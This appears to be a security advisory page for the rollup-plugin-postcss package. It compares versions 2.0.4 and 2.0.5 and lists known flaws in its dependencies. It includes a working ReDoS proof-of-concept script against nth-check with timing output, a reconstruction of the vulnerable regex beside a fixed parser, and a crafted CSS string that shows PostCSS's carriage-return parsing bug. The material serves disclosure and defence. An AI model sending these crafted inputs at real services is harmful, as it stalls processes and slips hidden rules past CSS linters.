rollup-plugin-postcss integrates PostCSS into a Rollup build so that CSS is processed as part of the JavaScript bundling pipeline. Comparing versions 2.0.4 and 2.0.5 turns up only small differences. The runtime dependencies are identical in both versions, including cssnano for CSS minification and postcss-modules for CSS Modules support, and the development dependencies are pinned to the same versions as well.
The differences are in the metadata. Version 2.0.4 was published on January 22, 2020 and version 2.0.5 on January 26, 2020, four days later. The unpacked size is 48964 bytes for 2.0.4 and 48943 bytes for 2.0.5, a 21-byte difference, which is consistent with a one-line change and says nothing by itself about what changed.
For developers, upgrading from 2.0.4 to 2.0.5 looks low-risk: with no dependency changes and a patch-level version bump, a bug fix or small internal adjustment is the most likely content, but that is an inference from the metadata, not a statement of what the release contains. No changelog is reproduced here, so the project's release notes or the diff between the two published tarballs are the authoritative record; read them, then run your own test suite after updating. Because the dependency list is unchanged, the upgrade also does not change a project's exposure to the dependency vulnerabilities listed below; that exposure is determined by which versions of postcss and nth-check the lockfile actually resolves.
Known vulnerabilities affecting version 2.0.5 of the package (both are in dependencies the plugin pulls in rather than in its own code: postcss directly, nth-check through cssnano's SVG optimisation chain)
Inefficient Regular Expression Complexity in nth-check
nth-check versions before 2.0.1 contain a Regular Expression Denial of Service (ReDoS): parsing a crafted, invalid nth-check formula (the argument of :nth-child() and related selectors) takes time that grows superlinearly with the input length, roughly quadratically as the output below shows, so anyone who controls a selector that reaches the parser can stall the process.
The cause is the sub-pattern \s*(?:([+-]?)\s*(\d+))? in the formula regex. The two \s* quantifiers are adjacent and can each absorb the same run of whitespace ("quantified overlapping adjacency"), so when the match fails on the character after that run the engine backtracks through every possible split of the run before giving up. The following code exercises it.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")   // any release before 2.0.1 is affected
// Each iteration builds "2n", then i*10000 spaces, then "!" (which makes the
// formula invalid) and times how long nthCheck.parse takes to reject it.
// The loop nominally runs 50000 times; in practice you stop it after a few
// iterations, since each one takes longer than the last.
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = '2n' + ' '.repeat(i*10000) + "!";
  try {
    nthCheck.parse(attack_str)
  }
  catch (err) {
    // parse always throws for this input; the cost is in reaching the throw
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
  }
}
The Output (first five iterations)
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
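To make the "quantified overlapping adjacency" concrete, here is an added example; it is not code from the nth-check project or from the advisory. It reconstructs the affected pattern as ^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$ (the page quotes only the sub-pattern, so treating this as the full expression is an assumption) and puts it beside a single-pass parser for the same an+b formulas that has no backtracking state at all. The function names and the small timing helper are mine; the single-pass parser is stricter than the regex about whitespace between a leading sign and its digits.

```javascript
// Added example, not nth-check's own code. VULNERABLE_RE is reconstructed from
// the sub-pattern quoted in the advisory (assumption: this is the full pattern).
// The adjacent quantifiers \s* ... \s* are the overlap: on "2n" + k spaces + "!"
// the engine tries every way of splitting the k spaces between them, and each
// attempt then fails on "!", so rejecting the input costs on the order of k^2 steps.
const VULNERABLE_RE = /^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$/;

// Regex-based parse in the style of the affected versions: returns [a, b]
// for an "an+b" formula, or throws on malformed input.
function parseNthWithRegex(formula) {
  const s = formula.trim().toLowerCase();
  if (s === 'even') return [2, 0];
  if (s === 'odd') return [2, 1];
  const m = VULNERABLE_RE.exec(s);
  if (!m) throw new SyntaxError('Invalid nth-check formula: ' + formula);
  let a = 0;
  if (m[1]) {
    const coeff = m[1].slice(0, -1); // drop the trailing "n"
    a = coeff === '' || coeff === '+' ? 1 : coeff === '-' ? -1 : parseInt(coeff, 10);
  }
  const b = m[3] ? parseInt(m[2] + m[3], 10) : 0; // m[2] is the sign or ""
  return [a, b];
}

// Single left-to-right pass over the same formulas. Every loop advances the
// index, so the work is bounded by the input length however the whitespace
// is arranged; there is no engine state to backtrack into.
function parseNthLinear(formula) {
  const s = formula.trim().toLowerCase();
  if (s === 'even') return [2, 0];
  if (s === 'odd') return [2, 1];
  const n = s.length;
  let i = 0;
  const fail = () => { throw new SyntaxError('Invalid nth-check formula: ' + formula); };
  const skipWs = () => { while (i < n && ' \t\n\r\f'.includes(s[i])) i++; };
  const readSign = () => (i < n && (s[i] === '+' || s[i] === '-')) ? (s[i++] === '-' ? -1 : 1) : 1;
  const readInt = () => {
    const start = i;
    while (i < n && s[i] >= '0' && s[i] <= '9') i++;
    return i === start ? null : Number(s.slice(start, i));
  };
  const sign = readSign();
  const coeff = readInt();
  let a = 0, b = 0;
  if (i < n && s[i] === 'n') {           // "an" part present
    i++;
    a = sign * (coeff === null ? 1 : coeff);
    skipWs();
    if (i < n) {                         // optional "+b" / "-b" part
      const offSign = readSign();
      skipWs();
      const off = readInt();
      if (off === null) fail();
      b = offSign * off;
    }
  } else {                               // bare integer: just b
    if (coeff === null) fail();
    b = sign * coeff;
  }
  if (i !== n) fail();                   // anything left over is garbage
  return [a, b];
}

// Time the regex rejecting an attack string of the shape used in the PoC.
// k is kept small here; the cost grows roughly with k^2, as the page's output shows.
function regexRejectMillis(k) {
  const attack = '2n' + ' '.repeat(k) + '!';
  const start = Date.now();
  let threw = false;
  try { parseNthWithRegex(attack); } catch (e) { threw = true; }
  return { threw, ms: Date.now() - start };
}

for (const f of ['2n+1', 'odd', '-n+3', '3n - 2', '5']) {
  console.log(f.padEnd(8), 'regex:', parseNthWithRegex(f), 'linear:', parseNthLinear(f));
}
for (const k of [1000, 2000, 4000]) {
  console.log('regex reject, k=' + k + ':', regexRejectMillis(k).ms + ' ms');
}
```

Both functions agree on well-formed formulas; the difference only shows on malformed input, where the regex version's rejection time climbs with the amount of whitespace and the single-pass version's does not. The same shape of fix, replacing a backtracking regex with an explicit scanner, is the usual remedy for this class of bug.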
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters that use PostCSS to parse external Cascading Style Sheets (CSS): a lone carriage return (\r) can cause PostCSS to tokenise the input in a way that disagrees with how the CSS is otherwise read, as demonstrated by @font-face{ font:(\r/*);} in a rule.
The practical risk is to linters and other tools that run PostCSS over untrusted CSS. An attacker can prepare CSS so that it contains parts PostCSS parses as a CSS comment; after processing, those parts appear in the PostCSS output as CSS nodes (rules, properties) despite having originally been inside a comment, so what the linter validated and what is emitted are not the same stylesheet. The fix is PostCSS 8.4.31 or later. For rollup-plugin-postcss the version that matters is the one the lockfile resolves for the plugin's postcss dependency, not the plugin version itself. As a stop-gap until that upgrade is in place, CSS from untrusted sources can have its line endings normalised to \n before it reaches the parser, which removes the lone \r the demonstration depends on; that is a mitigation suggested here, not part of the advisory.